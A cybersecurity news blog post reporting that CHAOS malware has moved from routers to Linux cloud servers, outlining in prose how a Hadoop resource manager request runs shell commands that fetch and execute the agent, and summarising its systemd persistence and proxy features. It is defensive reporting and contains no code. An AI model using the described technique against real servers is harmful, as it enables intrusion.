April 8, 2026

Chaos Malware Spreads to Linux Cloud Servers via Routers

Vaibhav April 8, 2026
Chaos-Malware-Spreads-to-Linux-Cloud-Servers-via-Routers
Post Views: 8

CHAOS Malware Expands From Routers to Linux Cloud Servers

In a concerning development, the CHAOS malware, initially identified by Lumen’s Black Lotus Labs, has expanded its scope from targeting routers and edge devices to compromising Linux cloud servers.

  • This shift marks a significant escalation in the threat landscape, as cloud servers often hold sensitive data and provide critical infrastructure for organizations.
  • The attack begins with an HTTP request to the Hadoop deployment’s resource manager endpoint, which defines a new application and embeds a sequence of shell commands.
  • These commands pull a CHAOS agent binary from an attacker-controlled server, set permissions, execute the binary, and delete it from disk.
  • The CHAOS agent binary is served from a domain previously linked to Operation Silk Lure, a separate campaign that distributed the ValleyRAT remote access trojan through malicious job application attachments.
  • The new CHAOS sample is a 64-bit ELF binary compiled for x86-64 Linux, marking a departure from earlier variants that targeted ARM, MIPS, and PowerPC architectures.
  • The internal namespace was restructured, and several functions were rewritten or removed, including the SSH brute-forcing spreader and certain vulnerability exploitation routines previously inherited from Kaiji.

New Persistence Method

The malware establishes persistence using systemd and stores a keep-alive script on disk.

Proxy Functionality

The malware supports various protocols, including HTTP, TLS, TCP, UDP, and WebSocket, and features a SOCKS proxy function.

Circumstantial Evidence

While definitive attribution remains difficult, Darktrace’s analysis attributes suspected Chinese origin to CHAOS based on Chinese-language strings in the malware binary and zh-CN locale indicators.

According to Darktrace’s research, the expansion of CHAOS malware from routers to Linux cloud servers poses a significant threat to organizations running cloud workloads.

Conclusion

Organizations must prioritize proper security configurations and continuous monitoring to protect themselves against this evolving threat.



Blog Image

About Author

Vaibhav

See author's posts

More Stories

Protecting-Against-Evolving-Cloud-Security-Threats

Protecting Against Evolving Cloud Security Threats

Vaibhav April 8, 2026
Massive-Data-Breach-Affects-Major-US-Agencies-Including-FBI-IRS-and-NASA-via-Salesforce-Security-Incident

Massive Data Breach Affects Major US Agencies Including FBI, IRS, and NASA via Salesforce Security Incident

Vaibhav April 3, 2026
Secure-On-Premises-AI-Governance-Solutions-with-APERION-SmartFlow-SDK

Secure On-Premises AI Governance Solutions with APERION SmartFlow SDK

Vaibhav April 3, 2026

Latest Cyber Security News

Drift-Protocol-Experiences-Record-Breaking-28-Million-Crypto-Hack-in-2026

Drift Protocol Experiences Record-Breaking $28 Million Crypto Hack in 2026

Vaibhav April 8, 2026
Amazon-Customer-Receives-Detergent-Instead-of-Graphics-Card-Worth-Over-38-000-Files-Complaint-alleged-Amazon-Scam-GPU-Delivery-Mixup-Amazon-Customer-Service-Issue-customer-service-failure

Amazon Customer Receives Detergent Instead of Graphics Card Worth Over $38,000, Files Complaint, alleged Amazon Scam, GPU Delivery Mixup, Amazon Customer Service Issue, customer service failure

Vaibhav April 8, 2026
Suspected-Anodot-Data-Breach-Impacts-Snowflake-Customers

Suspected Anodot Data Breach Impacts Snowflake Customers

Vaibhav April 8, 2026
FBI-Reports-Cybercrime-Costs-Exceeded-21-Billion-Dollars-in-2025

FBI Reports Cybercrime Costs Exceeded 21 Billion Dollars in 2025

Vaibhav April 8, 2026
docker-fixes-authz-bypass-vulnerability-exposing-containers-with-unrestricted-access

docker-fixes-authz-bypass-vulnerability-exposing-containers-with-unrestricted-access

Vaibhav April 8, 2026
en_USEnglish
en_USEnglish